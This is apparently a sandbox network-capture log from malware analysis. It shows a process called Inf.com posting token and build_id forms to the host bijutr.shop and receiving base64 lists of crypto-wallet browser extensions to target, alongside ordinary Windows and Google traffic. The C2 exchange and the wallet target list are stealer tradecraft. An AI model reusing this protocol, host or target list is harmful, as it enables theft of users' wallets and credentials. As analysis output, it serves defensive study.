                                                                                                                                                                                                                                                                            2024-12-27 06:10:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:44 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:44 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                            Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            27192.168.2.649945188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:46 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----C2DB1DJMYMYM7YUS2VKX
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:46 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------C2DB1DJMYMYM7YUS2VKXContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------C2DB1DJMYMYM7YUS2VKXContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------C2DB1DJMYMYM7YUS2VKXCont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:46 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:46 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            28192.168.2.649951188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:48 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----VS0RQQ1NYCBAIEC2DB1D
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 5665
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:48 UTC5665OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 30 52 51 51 31 4e 59 43 42 41 49 45 43 32 44 42 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 51 31 4e 59 43 42 41 49 45 43 32 44 42 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 56 53 30 52 51 51 31 4e 59 43 42 41 49 45 43 32 44 42 31 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------VS0RQQ1NYCBAIEC2DB1DContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------VS0RQQ1NYCBAIEC2DB1DContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------VS0RQQ1NYCBAIEC2DB1DCont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:49 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            29192.168.2.649953188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:49 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----R9Z5X4W47GVAIM7GLNG4
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 489
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:49 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 35 58 34 57 34 37 47 56 41 49 4d 37 47 4c 4e 47 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------R9Z5X4W47GVAIM7GLNG4Cont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:50 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            30192.168.2.64995420.198.119.84443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 56 75 55 61 51 45 4e 30 54 6b 61 6b 6b 52 6a 44 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 31 31 31 39 61 38 66 62 35 66 33 39 37 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: VuUaQEN0TkakkRjD.1Context: 171119a8fb5f3971
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 56 75 55 61 51 45 4e 30 54 6b 61 6b 6b 52 6a 44 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 31 31 31 39 61 38 66 62 35 66 33 39 37 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: VuUaQEN0TkakkRjD.2Context: 171119a8fb5f3971<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:10:50 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 56 75 55 61 51 45 4e 30 54 6b 61 6b 6b 52 6a 44 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 37 31 31 31 39 61 38 66 62 35 66 33 39 37 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: VuUaQEN0TkakkRjD.3Context: 171119a8fb5f3971
                                                                                                                                                                                                                                                                            2024-12-27 06:10:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:10:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 52 41 73 76 6e 66 31 62 76 45 53 49 76 63 6b 79 73 51 58 61 37 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: RAsvnf1bvESIvckysQXa7A.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            31192.168.2.649967142.250.181.684437472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:53 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vatm2rQAm_YT07zmOQ1YfQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC124INData Raw: 31 32 34 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 67 69 6e 67 65 72 62 72 65 61 64 20 67 61 6c 61 20 72 65 77 61 72 64 73 22 2c 22 76 69 63 74 6f 72 20 77 65 6d 62 61 6e 79 61 6d 61 22 2c 22 68 6f 6e 64 61 20 6e 69 73 73 61 6e 20 6d 65 72 67 65 72 20 74 61 6c 6b 73 22 2c 22 73 6f 63 69 61 6c 20 73 65 63 75 72 69 74 79 20 62 65 6e 65
                                                                                                                                                                                                                                                                            Data Ascii: 1244)]}'["",["monopoly go gingerbread gala rewards","victor wembanyama","honda nissan merger talks","social security bene
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 66 69 74 73 20 32 30 32 35 22 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d 20 77 61 72 6e 69 6e 67 22 2c 22 71 75 61 6e 74 75 6d 20 63 6f 6d 70 75 74 69 6e 67 20 73 74 6f 63 6b 73 22 2c 22 63 75 6c 70 61 20 74 75 79 61 20 6d 6f 76 69 65 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 70 68 69 6c 61 64 65 6c 70 68 69 61 20 70 68 69 6c 6c 69 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33
                                                                                                                                                                                                                                                                            Data Ascii: fits 2025","winter storm warning","quantum computing stocks","culpa tuya movie release date","philadelphia phillies"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 33 42 34 53 45 6b 7a 62 6b 52 49 51 53 74 51 4e 7a 46 73 4e 57 46 73 63 56 52 70 57 44 68 61 5a 30 78 53 62 55 64 4d 57 46 64 6b 54 46 4e 5a 53 6b 70 6c 62 30 70 45 4d 30 4e 42 64 47 6f 79 54 30 49 77 62 7a 6c 51 55 47 46 34 56 33 42 75 59 56 52 74 53 55 5a 35 51 58 41 33 4d 48 41 79 56 32 6f 7a 65 6b 4e 50 52 6b 4a 47 52 47 46 4d 4e 46 5a 4e 63 33 64 34 4f 54 64 34 4b 32 68 76 4e 57 4a 68 5a 54 4d 77 56 31 6c 44 54 58 67 34 65 6e 41 32 4d 48 4a 7a 52 6e 6f 78 52 30 35 54 4d 6b 38 30 54 6d 77 78 52 46 56 77 55 58 70 79 63 48 52 32 52 6b 67 35 62 6d 5a 6a 53 47 4e 53 4b 32 78 4b 53 45 63 78 64 57 5a 75 52 55 34 33 64 45 74 74 56 57 4a 59 51 6a 68 46 56 6a 5a 4a 64 6b 52 6b 62 54 42 70 65 6b 30 77 62 6c 46 6c 53 6b 64 42 55 46 68 51 59 6b 35 45 5a 47 59 77
                                                                                                                                                                                                                                                                            Data Ascii: 3B4SEkzbkRIQStQNzFsNWFscVRpWDhaZ0xSbUdMWFdkTFNZSkplb0pEM0NBdGoyT0IwbzlQUGF4V3BuYVRtSUZ5QXA3MHAyV2ozekNPRkJGRGFMNFZNc3d4OTd4K2hvNWJhZTMwV1lDTXg4enA2MHJzRnoxR05TMk80TmwxRFVwUXpycHR2Rkg5bmZjSGNSK2xKSEcxdWZuRU43dEttVWJYQjhFVjZJdkRkbTBpek0wblFlSkdBUFhQYk5EZGYw
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 67 76 62 53 38 77 4e 58 68 32 61 68 49 4e 51 6d 46 7a 5a 57 4a 68 62 47 77 67 64 47 56 68 62 54 4b 47 44 32 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 70 56 6b 4a 50 55 6e 63 77 53 30 64 6e 62 30 46 42 51 55 46 4f 55 31 56 6f 52 56 56 6e 51 55 46 42 52 55 46 42 51 55 46 42 4e 55 4e 42 54 55 46 42 51 55 4e 34 62 58 51 7a 62 45 46 42 51 55 45 79 4d 55 4a 4e 56 6b 56 59 4c 79 38 76 4f 45 4a 50 4d 31 42 4a 53 47 70 7a 51 55 31 48 4d 45 46 4c 56 32 39 42 54 31 68 4a 51 55 30 79 4c 30 64 42 51 7a 5a 4f 62 54 64 4d 52 6b 46 44 61 6b 56 42 51 30 52 47 51 55 4e 56 51 55 34 7a 53 48 56 35 63 7a 59 34 64 7a 6c 42 51 55 35 59 52 45 68 46 65 6c 56 42 54 46 64 33 51 55 6b 79 5a 30 46
                                                                                                                                                                                                                                                                            Data Ascii: ntityinfo":"CggvbS8wNXh2ahINQmFzZWJhbGwgdGVhbTKGD2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFBNUNBTUFBQUN4bXQzbEFBQUEyMUJNVkVYLy8vOEJPM1BJSGpzQU1HMEFLV29BT1hJQU0yL0dBQzZObTdMRkFDakVBQ0RGQUNVQU4zSHV5czY4dzlBQU5YREhFelVBTFd3QUkyZ0F
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC390INData Raw: 5a 61 52 45 52 43 51 32 46 43 55 6a 56 31 4d 55 68 7a 4e 6b 46 49 61 56 46 44 5a 30 6c 4a 56 45 6c 54 51 30 74 7a 53 58 64 36 61 6d 52 6c 51 6e 46 47 56 33 56 42 65 55 55 72 4f 45 4a 6a 51 6e 56 54 52 6d 46 43 4e 33 64 68 55 48 52 33 51 30 35 76 55 32 51 31 61 45 34 7a 4d 55 5a 77 4e 44 42 32 64 57 52 34 62 6e 70 31 55 57 64 57 5a 6e 59 76 53 55 5a 34 64 56 56 30 54 6e 4e 34 4c 33 6f 78 62 6c 56 42 59 57 39 76 54 6a 52 43 53 46 6c 46 59 6d 63 72 53 44 68 30 61 6d 73 30 4c 32 52 4b 61 30 6c 45 63 32 35 74 52 30 73 30 4d 32 56 34 64 48 64 6a 4d 54 68 42 62 45 70 51 56 55 6c 6d 54 58 59 78 65 46 46 74 5a 32 74 59 57 55 56 42 53 57 64 77 4f 56 51 35 62 6c 42 50 63 56 6c 6a 61 45 30 79 53 32 56 69 55 46 4e 4b 62 6d 64 71 55 6e 67 7a 53 58 49 32 56 32 56 6e 55
                                                                                                                                                                                                                                                                            Data Ascii: ZaRERCQ2FCUjV1MUhzNkFIaVFDZ0lJVElTQ0tzSXd6amRlQnFGV3VBeUUrOEJjQnVTRmFCN3dhUHR3Q05vU2Q1aE4zMUZwNDB2dWR4bnp1UWdWZnYvSUZ4dVV0TnN4L3oxblVBYW9vTjRCSFlFYmcrSDh0ams0L2RKa0lEc25tR0s0M2V4dHdjMThBbEpQVUlmTXYxeFFtZ2tYWUVBSWdwOVQ5blBPcVljaE0yS2ViUFNKbmdqUngzSXI2V2VnU
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC91INData Raw: 35 35 0d 0a 49 7a 55 47 64 45 61 30 46 50 61 45 6c 5a 64 47 78 54 64 30 4a 4d 61 47 78 68 59 6e 56 46 56 6e 4d 72 62 46 4a 4a 51 58 52 4b 56 6b 6f 7a 62 31 46 50 63 45 46 58 51 6b 38 31 52 6b 64 50 55 56 56 7a 63 6d 64 50 4e 45 4e 6e 52 45 6c 54 54 47 46 55 61 6e 6c 0d 0a
